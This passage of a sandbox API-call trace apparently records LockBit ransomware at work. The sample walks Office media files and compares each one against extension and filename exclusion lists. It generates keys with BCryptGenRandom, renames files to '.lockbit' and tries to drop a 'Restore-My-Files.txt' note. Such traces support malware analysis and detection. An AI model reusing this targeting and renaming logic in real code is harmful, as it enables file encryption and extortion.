Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.983] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e7ca500, ftCreationTime.dwHighDateTime=0x1be6c1a, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7e7ca500, ftLastWriteTime.dwHighDateTime=0x1be6c1a, nFileSizeHigh=0x0, nFileSizeLow=0x1c06, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216588.WMF", cAlternateFileName="")) returned 1 [0196.983] lstrcmpiW (lpString1=".", lpString2="J0216588.WMF") returned -1 [0196.983] lstrcmpiW (lpString1="..", lpString2="J0216588.WMF") returned -1 [0196.983] PathFindExtensionW (pszPath="J0216588.WMF") returned=".WMF" [0196.983] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.983] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.984] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.984] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216588.WMF") returned 1 [0196.985] lstrcmpiW (lpString1="ntldr", lpString2="J0216588.WMF") returned 1 [0196.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216588.WMF") returned 1 [0196.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216588.WMF") returned -1 [0196.985] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216588.WMF") returned -1 [0196.985] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216588.WMF") returned 1 [0196.985] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216588.WMF") returned -1 [0196.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF") returned=".WMF" [0196.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.985] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.986] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.986] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF.lockbit") returned 70 [0196.986] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216588.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0196.988] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.988] malloc (_Size=0x40068) returned 0x3df0008 [0196.988] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7174) returned 1 [0196.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.989] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.994] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.994] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.994] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.996] free (_Block=0x1fa2ed8) [0196.996] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.996] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.996] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff3ba100, ftCreationTime.dwHighDateTime=0x1be6c1a, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xff3ba100, ftLastWriteTime.dwHighDateTime=0x1be6c1a, nFileSizeHigh=0x0, nFileSizeLow=0x5d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216724.WMF", cAlternateFileName="")) returned 1 [0196.996] lstrcmpiW (lpString1=".", lpString2="J0216724.WMF") returned -1 [0196.996] lstrcmpiW (lpString1="..", lpString2="J0216724.WMF") returned -1 [0196.996] PathFindExtensionW (pszPath="J0216724.WMF") returned=".WMF" [0196.996] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.996] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.997] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.997] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216724.WMF") returned 1 [0196.998] lstrcmpiW (lpString1="ntldr", lpString2="J0216724.WMF") returned 1 [0196.998] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216724.WMF") returned 1 [0196.998] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216724.WMF") returned -1 [0196.998] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216724.WMF") returned -1 [0196.998] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216724.WMF") returned 1 [0196.998] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216724.WMF") returned -1 [0196.998] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.998] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF") returned=".WMF" [0196.998] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.998] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.998] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.999] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.999] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF.lockbit") returned 70 [0196.999] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216724.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.001] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.001] malloc (_Size=0x40068) returned 0x3df0008 [0197.001] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=23928) returned 1 [0197.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.003] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.008] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.008] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.008] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.011] free (_Block=0x1fa2ed8) [0197.011] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.011] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.011] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.011] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825cf700, ftCreationTime.dwHighDateTime=0x1be6c1b, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x825cf700, ftLastWriteTime.dwHighDateTime=0x1be6c1b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216858.WMF", cAlternateFileName="")) returned 1 [0197.011] lstrcmpiW (lpString1=".", lpString2="J0216858.WMF") returned -1 [0197.012] lstrcmpiW (lpString1="..", lpString2="J0216858.WMF") returned -1 [0197.012] PathFindExtensionW (pszPath="J0216858.WMF") returned=".WMF" [0197.012] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.012] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.013] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.013] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216858.WMF") returned 1 [0197.013] lstrcmpiW (lpString1="ntldr", lpString2="J0216858.WMF") returned 1 [0197.013] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216858.WMF") returned 1 [0197.013] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216858.WMF") returned -1 [0197.014] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216858.WMF") returned -1 [0197.014] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216858.WMF") returned 1 [0197.014] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216858.WMF") returned -1 [0197.014] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.014] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF") returned=".WMF" [0197.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.014] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.014] lstrcmpiW 